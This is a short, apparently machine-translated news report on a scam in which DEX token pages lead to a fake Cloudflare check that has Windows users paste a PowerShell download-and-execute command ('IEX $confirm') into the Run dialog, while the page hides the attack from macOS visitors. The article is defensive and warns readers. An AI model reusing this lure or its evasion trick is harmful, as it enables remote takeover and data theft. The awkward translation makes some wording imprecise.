Fake buttons with malicious code began to appear on DEX token pages

Researchers from SCAM Sniffer reported a dangerous attack aimed at users of decentralized exchanges. On the pages with information about tokens such as Fucklaunch, a Fake WebSite, leading to a malicious domain, was discovered. When crossing the link, the user proposes to go through fake verification through the CloudFlare system. However, instead of a regular check, the victim is faced with the instructions for launching a dangerous PowerShell team.

On devices running Windows, a message pops up in which they ask to press Windows + R, insert a copied text and confirm the input. In fact, the user launches in the PowerShell script system, which uploads and executes the code from the external site. This opens up direct access to the computer to attackers, allowing you to steal data or install malicious software.

On MacOS devices, activity does not appear – users see a regular page. This was done intentionally to disguise the attack from analysts and reduce the likelihood of identification. Such selectivity in the operating system makes an attack more difficult for detection and analysis.

Judging by the code, the malicious script uses the IEX $ confirm command, loading the external contents from the Four-Meme domain. This is a standard technique for remote commands in a Windows environment.

Experts warn that such schemes can be extended to other tokens or pages with DEX analytics. They recommend with caution to the clicks on references to new projects, especially if the site offers to pass verification or execute commands in the system. SCAM Sniffer calls on web3 users always check the addresses of sites manually, not to launch the proposed commands from unfamiliar resources and use antivirus software.

Author

Peter Ivanov